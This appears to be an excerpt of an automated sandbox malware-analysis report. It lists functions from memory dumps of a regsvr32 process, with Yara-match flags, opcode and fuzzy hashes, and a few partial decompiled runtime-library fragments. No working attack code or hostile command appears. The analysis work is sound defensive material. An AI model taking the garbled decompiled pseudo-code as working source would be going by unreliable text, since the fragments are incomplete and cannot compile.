                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02601C60 Relevance: 3.8, Strings: 3, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *$Y5$q
                                                                                                    • API String ID: 0-4160727001
                                                                                                    • Opcode ID: eea88e1dd582ba8813b159f6c1652d4cc2e3030e78795c6cf72d15c2b4b07331
                                                                                                    • Instruction ID: bdbf49de59ad66862bb887eae8e69a1f106dc31064d614335f3b6bdc7f65e940
                                                                                                    • Opcode Fuzzy Hash: eea88e1dd582ba8813b159f6c1652d4cc2e3030e78795c6cf72d15c2b4b07331
                                                                                                    • Instruction Fuzzy Hash: ED318EB180038E8FDB48DF64D8865CE7BB5FB58348F115A19E86996290D3B8D6A4CFC4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0262308C Relevance: 3.8, Strings: 3, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: &I$7d$vt[t
                                                                                                    • API String ID: 0-2007995187
                                                                                                    • Opcode ID: 3251769f7a344f860e7f6c1c219e00c9af92040a7e6dd6688b1b7fa2e2f00760
                                                                                                    • Instruction ID: 08f037b0db34d1e5afd9cb8e9ff5d9cc5b31798d1efbea4c1c19e1eb7bf44eca
                                                                                                    • Opcode Fuzzy Hash: 3251769f7a344f860e7f6c1c219e00c9af92040a7e6dd6688b1b7fa2e2f00760
                                                                                                    • Instruction Fuzzy Hash: C7316CB1528380ABD388DF28D48981BBBF1FBD9309F80AA1DF8858B390D774D445CB06
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02611E1C Relevance: 3.8, Strings: 3, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: +*$<W#$GV
                                                                                                    • API String ID: 0-4237392931
                                                                                                    • Opcode ID: f5e78a583757a1b4cf7a2cbb4d63938b75b5737720197201c45f0501863317a2
                                                                                                    • Instruction ID: 2ec8ae06668b01d7edb6ddaf58a0f2ab76ee39b772d17eefe6911dd042b7f333
                                                                                                    • Opcode Fuzzy Hash: f5e78a583757a1b4cf7a2cbb4d63938b75b5737720197201c45f0501863317a2
                                                                                                    • Instruction Fuzzy Hash: AC2180B552D780EBD388DF28D59591ABBE0BBC9308F80AA1DF8868B350D3B4D445CF02
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02609490 Relevance: 3.8, Strings: 3, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Fx9D$\j$a*Dp
                                                                                                    • API String ID: 0-2177203914
                                                                                                    • Opcode ID: 7f268daa9a668b519c9e1107caad7b3410410112d9982d43d26879378ab3ef4c
                                                                                                    • Instruction ID: 1202c7b711ab8215351b69a5a5cd0e8aa2a1d15440ca14e61fb826f92065d1bb
                                                                                                    • Opcode Fuzzy Hash: 7f268daa9a668b519c9e1107caad7b3410410112d9982d43d26879378ab3ef4c
                                                                                                    • Instruction Fuzzy Hash: 3B2159B45187848BD388DF28D08A40BBBE0BB9C35CF414B1DF4CAA62A0D778D644CB4B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002D69C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 15%
                                                                                                    			E0000000118002D69C(void* __edx, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t20;
				long long* _t25;
				long long* _t41;
				void* _t49;
				void* _t50;

				_t25 = _t41;
				 *((long long*)(_t25 + 8)) = __rbx;
				 *((long long*)(_t25 + 0x10)) = __rbp;
				 *((long long*)(_t25 + 0x18)) = __rsi;
				 *((long long*)(_t25 + 0x20)) = __rdi;
				_t20 = r9d;
				_t50 = __rcx;
				E0000000118002CDF4(0xd, __rbx, "GetLocaleInfoEx", __r8, 0x8004c208, "GetLocaleInfoEx");
				if (_t25 == 0) goto 0x8002d6ff;
				 *0x8004a430();
				r9d = _t20;
				 *_t25();
				goto 0x8002d719;
				E0000000118002DB80(0, 0, _t25, _t25, _t50, __r8, _t49);
				r9d = _t20;
				return GetLocaleInfoW(??, ??, ??, ??);
			}








                                                                                                    0x18002d69c
                                                                                                    0x18002d69f
                                                                                                    0x18002d6a3
                                                                                                    0x18002d6a7
                                                                                                    0x18002d6ab
                                                                                                    0x18002d6b5
                                                                                                    0x18002d6c4
                                                                                                    0x18002d6da
                                                                                                    0x18002d6e5
                                                                                                    0x18002d6ea
                                                                                                    0x18002d6f0
                                                                                                    0x18002d6fb
                                                                                                    0x18002d6fd
                                                                                                    0x18002d704
                                                                                                    0x18002d70b
                                                                                                    0x18002d733

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                    • Opcode ID: 24fe43e77785f5d4a528765d21521954d2de20712f39a8ecbafee2dbc43afcc2
                                                                                                    • Instruction ID: 2b9a22572d1800136de5f447a904be36519ce16691e4ab665c720d9f47ef4d94
                                                                                                    • Opcode Fuzzy Hash: 24fe43e77785f5d4a528765d21521954d2de20712f39a8ecbafee2dbc43afcc2
                                                                                                    • Instruction Fuzzy Hash: 65018431700B8882EA869B57B4407C977A5F7CDFC8F59C127EE0913B65CEB8CA5A8304
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180030B24 Relevance: 3.4, APIs: 2, Instructions: 425COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 27%
                                                                                                    			E00000001180030B24(void* __ecx, intOrPtr __edx, signed int __rax, long long __rbx, void* __rcx, intOrPtr _a8, intOrPtr _a16, long long _a24) {
				void* __rdi;
				void* __rsi;
				intOrPtr _t11;
				void* _t24;
				void* _t27;
				signed long long _t31;
				void* _t37;
				void* _t39;
				signed long long _t45;

				_a24 = __rbx;
				_a16 = __edx;
				_t11 = __edx;
				if (__rcx != 0) goto 0x80030b5c;
				E0000000118002E69C(__rax);
				 *__rax = 0x16;
				_t31 = __rax | 0xffffffff;
				goto 0x80030bf0;
				0x80046f51();
				if (_t31 == 0) goto 0x80030bcf;
				if (_t31 == __rcx) goto 0x80030bcf;
				_t45 =  *0x8005e610; // 0xc5d970
				bpl =  *((intOrPtr*)(_t31 + 1)) == sil;
				_t24 = _t45 -  *0x8005e628; // 0xc5d970
				_a8 = bpl;
				if (_t24 != 0) goto 0x80030ba5;
				E00000001180031104(__rbx, _t45, _t37, __rcx, _t39);
				 *0x8005e610 = _t31;
				r12d = 1;
				if (_t31 != 0) goto 0x80030c73;
				if (_t11 == 0) goto 0x80030c08;
				_t27 =  *0x8005e618 - _t39; // 0x0
				if (_t27 == 0) goto 0x80030c08;
				0x80010e10();
				if (_t31 != 0) goto 0x80030c67;
				E0000000118002E69C(_t31);
				 *_t31 = 0x16;
				E0000000118002E8A0(_t31, __rcx);
				return 0;
			}












                                                                                                    0x180030b24
                                                                                                    0x180030b29
                                                                                                    0x180030b3e
                                                                                                    0x180030b46
                                                                                                    0x180030b48
                                                                                                    0x180030b4d
                                                                                                    0x180030b53
                                                                                                    0x180030b57
                                                                                                    0x180030b64
                                                                                                    0x180030b6f
                                                                                                    0x180030b74
                                                                                                    0x180030b7a
                                                                                                    0x180030b81
                                                                                                    0x180030b85
                                                                                                    0x180030b8c
                                                                                                    0x180030b91
                                                                                                    0x180030b96
                                                                                                    0x180030b9e
                                                                                                    0x180030ba5
                                                                                                    0x180030bae
                                                                                                    0x180030bb6
                                                                                                    0x180030bb8
                                                                                                    0x180030bbf
                                                                                                    0x180030bc1
                                                                                                    0x180030bc9
                                                                                                    0x180030bcf
                                                                                                    0x180030bd8
                                                                                                    0x180030be9
                                                                                                    0x180030c07

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID:
                                                                                                    • API String ID: 1431749950-0
                                                                                                    • Opcode ID: f157810620072813886d33382c6a6b61231f13046fd37e9aaf856a55cb75b889
                                                                                                    • Instruction ID: ba8fb07293a0c0195b2a1c23719ed7880e6bbf34a8df5117445978fab81d38c3
                                                                                                    • Opcode Fuzzy Hash: f157810620072813886d33382c6a6b61231f13046fd37e9aaf856a55cb75b889
                                                                                                    • Instruction Fuzzy Hash: AFF1E231312A8C41FEEB9F6594113DA6790A70EBE0F26CB25BEA9477D1DE79C6498300
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180036CC8 Relevance: 3.3, APIs: 2, Instructions: 335COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00000001180036CC8(void* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t9;
				signed long long _t13;
				void* _t22;
				signed long long _t23;

				_t21 = _t22 - 0x148;
				_t23 = _t22 - 0x248;
				_t13 =  *0x8005d010; // 0xb03f6156e10
				 *(_t22 - 0x148 + 0x130) = _t13 ^ _t23;
				 *((long long*)(_t23 + 0x48)) = __rdx;
				 *((long long*)(_t23 + 0x58)) = __r8;
				if (__rcx != 0) goto 0x80036d3e;
				return E000000011800010E0(0, _t9,  *(_t21 + 0x130) ^ _t23);
			}







                                                                                                    0x180036cd5
                                                                                                    0x180036cdd
                                                                                                    0x180036ce4
                                                                                                    0x180036cee
                                                                                                    0x180036cfe
                                                                                                    0x180036d06
                                                                                                    0x180036d17
                                                                                                    0x180036d3d

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameTranslate$CodePageValid__lc_wcstolc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1519730825-0
                                                                                                    • Opcode ID: 2974e5ab5212bf9c6519b81db3410d8982f4e3ed542d4045f7286e5cf02df1c6
                                                                                                    • Instruction ID: 34a2c1f56979b34e641cd8ebbe878bf8daafb60353ff07bce8b45b73f2b9a3d4
                                                                                                    • Opcode Fuzzy Hash: 2974e5ab5212bf9c6519b81db3410d8982f4e3ed542d4045f7286e5cf02df1c6
                                                                                                    • Instruction Fuzzy Hash: 7DC1C43270068885FBE79B7295117EB6391EB8D7C8F55C526BE4A43AD6EF38C6488700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260A6C4 Relevance: 3.2, Strings: 2, Instructions: 746COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: YoS$U{/
                                                                                                    • API String ID: 0-3343756864
                                                                                                    • Opcode ID: 56a499f1ecb4fbdc5f69beceb6073d3bc9a3cf72b0051a6b219982261ac4e17f
                                                                                                    • Instruction ID: 490e1bb3eb7a4ba0d2c37a3989df286d0429feedfbd54a40736ba0bb00346751
                                                                                                    • Opcode Fuzzy Hash: 56a499f1ecb4fbdc5f69beceb6073d3bc9a3cf72b0051a6b219982261ac4e17f
                                                                                                    • Instruction Fuzzy Hash: 3D82F17150570DCFEB68CF28C49A5AE3BE9FB54308F20412DEC6A862A1D778E915CF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800463DC Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 15204871-0
                                                                                                    • Opcode ID: 211552337cba166584834b792317a23e391e4128e33ce619b5e215ff626ff406
                                                                                                    • Instruction ID: d65181fc259e888b2de731ae32edc120cda5e32d53d2d86ce0f8624bd4a69e2f
                                                                                                    • Opcode Fuzzy Hash: 211552337cba166584834b792317a23e391e4128e33ce619b5e215ff626ff406
                                                                                                    • Instruction Fuzzy Hash: 48B11C73600F888BEB56CF29C4853987BA0F388B8CF16C915EA59877B8DB39C555C705
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180048F20 Relevance: 3.0, APIs: 2, Instructions: 19nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LinkObjectOpenSymbolic
                                                                                                    • String ID:
                                                                                                    • API String ID: 3706036087-0
                                                                                                    • Opcode ID: c30857275a1cc96124ffbba78545127cfa6bd2c9b81dc261670aaeb2468f3642
                                                                                                    • Instruction ID: 2875d4e0f13c3cd99de5e96af7588e4bb1021d02566436065a68f514f7fb35bf
                                                                                                    • Opcode Fuzzy Hash: c30857275a1cc96124ffbba78545127cfa6bd2c9b81dc261670aaeb2468f3642
                                                                                                    • Instruction Fuzzy Hash: 79D02B31B1042083F7DEAB370CC235B10825759741FC5C4347A05C0480EC1DC36D0B08
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260EACC Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3$wp{
                                                                                                    • API String ID: 0-2005127262
                                                                                                    • Opcode ID: aae6045772a7b77037f5d7b1fbdda45a905ca962cb1a0cc6b6f7fe9cc4a29125
                                                                                                    • Instruction ID: 5e91a6c10d8e2a2c998d4bdb62f049272f7277b0f2d8a71ec573b72389489e68
                                                                                                    • Opcode Fuzzy Hash: aae6045772a7b77037f5d7b1fbdda45a905ca962cb1a0cc6b6f7fe9cc4a29125
                                                                                                    • Instruction Fuzzy Hash: 5B32D6709497CA8BDBF8CF24C8896ED7BE0FB48304F10156DD85E8A295DB786645CF82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026130CC Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: :E$-
                                                                                                    • API String ID: 0-2919322554
                                                                                                    • Opcode ID: 9775f0c4a14d0f6a0cad13f76995b0ecc4760f80a70f0dc6125ef670ab4e94da
                                                                                                    • Instruction ID: 6f86e08072e892140abf9b65c86bac5cbea8255068c2f91256458a318a4e1d65
                                                                                                    • Opcode Fuzzy Hash: 9775f0c4a14d0f6a0cad13f76995b0ecc4760f80a70f0dc6125ef670ab4e94da
                                                                                                    • Instruction Fuzzy Hash: D8D109709047888BDF58DFA9C8894DDBBB1FF48308F01821DE89AAB794C7789516CF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026225B0 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: lgp$}
                                                                                                    • API String ID: 0-876601176
                                                                                                    • Opcode ID: 9302d7771e28f2d421ac4a613fdd643702ed1771f683de153920aa1059af2eff
                                                                                                    • Instruction ID: f7a8c7d63aff23f4ea9f43263ddd7ea3e3f542ccc27c1dadc78d9de6261b2fe8
                                                                                                    • Opcode Fuzzy Hash: 9302d7771e28f2d421ac4a613fdd643702ed1771f683de153920aa1059af2eff
                                                                                                    • Instruction Fuzzy Hash: A1A146B590274CCFDB98CF28C68A58D7BE1FF55308F41412AFC1A9A2A4D3B4D528CB49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02603E0C Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0G$r1
                                                                                                    • API String ID: 0-307485293
                                                                                                    • Opcode ID: 28e0d7c36edfb65d9a53d232575c0ace2a278f0f87289f92883af6c4dd50dd4e
                                                                                                    • Instruction ID: 899b612761c1500b32395d3f26807daa26414ffebd9eb863a0af23defa3075f4
                                                                                                    • Opcode Fuzzy Hash: 28e0d7c36edfb65d9a53d232575c0ace2a278f0f87289f92883af6c4dd50dd4e
                                                                                                    • Instruction Fuzzy Hash: F961F671E04718DBDB6CDFA8E8C94AEBBB1FB54304F50422DE816A73A0CB749946CB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261C09C Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Co*]$g=Z
                                                                                                    • API String ID: 0-3499945854
                                                                                                    • Opcode ID: 2bf530cda78a9f2eca94d94e6df3abaa9de5ccab9e46b53aed32ca4382bbea27
                                                                                                    • Instruction ID: 2130c910c6002ed7b4b94c69dafcbb4e2d243e2f8a9dc65efd1650c38bbaf74f
                                                                                                    • Opcode Fuzzy Hash: 2bf530cda78a9f2eca94d94e6df3abaa9de5ccab9e46b53aed32ca4382bbea27
                                                                                                    • Instruction Fuzzy Hash: 7C7113715207499FDB88CF24C8CA8DD3FA1FB487A8FA56218FC0AA6250C774D885CB85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02625B74 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: [.$v'
                                                                                                    • API String ID: 0-707220717
                                                                                                    • Opcode ID: f8dd879694cb8969cf75ba327ce62ecd2057803a58bcf1228e6622dedff1898e
                                                                                                    • Instruction ID: d4e89f86c9cdc204f6a083fbdd64357c48c41472efbf2f8c70561d55cf250ff9
                                                                                                    • Opcode Fuzzy Hash: f8dd879694cb8969cf75ba327ce62ecd2057803a58bcf1228e6622dedff1898e
                                                                                                    • Instruction Fuzzy Hash: 3E518030A18F858BD768DF28C44961AB7E1FB88308F540A1DE5D6DB3A0DB38D906CF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260CF34 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /$}^
                                                                                                    • API String ID: 0-4143887201
                                                                                                    • Opcode ID: f1ac0981ba0d48a0680eb8b169090e5b37d2e1a3cdf89c0324983577a1792f0b
                                                                                                    • Instruction ID: 924df6af754a3a1ee8def3e216125e061fdefc5e26c3781aeb2f985e5ed0c620
                                                                                                    • Opcode Fuzzy Hash: f1ac0981ba0d48a0680eb8b169090e5b37d2e1a3cdf89c0324983577a1792f0b
                                                                                                    • Instruction Fuzzy Hash: 22415D7061DB448BD72CDF28D09652ABFF1FB86744F104A6DE68A873A1D770D805CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02605920 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <SOa$_7G
                                                                                                    • API String ID: 0-2587396516
                                                                                                    • Opcode ID: 1802a08e966e48d3448527e77cfb84f2037bbc4facd24e221dbad4eaac90704e
                                                                                                    • Instruction ID: b1ef629ab3d94c7ae081e742e94181a0037d0dd1d1abdc51c76ee5fd009a916f
                                                                                                    • Opcode Fuzzy Hash: 1802a08e966e48d3448527e77cfb84f2037bbc4facd24e221dbad4eaac90704e
                                                                                                    • Instruction Fuzzy Hash: 4551DB7554C78CCBEBB9CE38C8896DA37B0FB44714F940219D84E9E290DB785A86DB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02622D34 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: v_$r
                                                                                                    • API String ID: 0-1949507887
                                                                                                    • Opcode ID: f054a901c3892b469e600f1963f4730d96bc01b910600441e39f744677b177f7
                                                                                                    • Instruction ID: 88eadb7a6213e0e1cdb1913f9cdd203d8bd76baf7878c05048316877e648078c
                                                                                                    • Opcode Fuzzy Hash: f054a901c3892b469e600f1963f4730d96bc01b910600441e39f744677b177f7
                                                                                                    • Instruction Fuzzy Hash: E0419F7060CB858BD768DF28D48656ABBF1FB8A704F004A2DE5CEC7351DB749809CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02615264 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
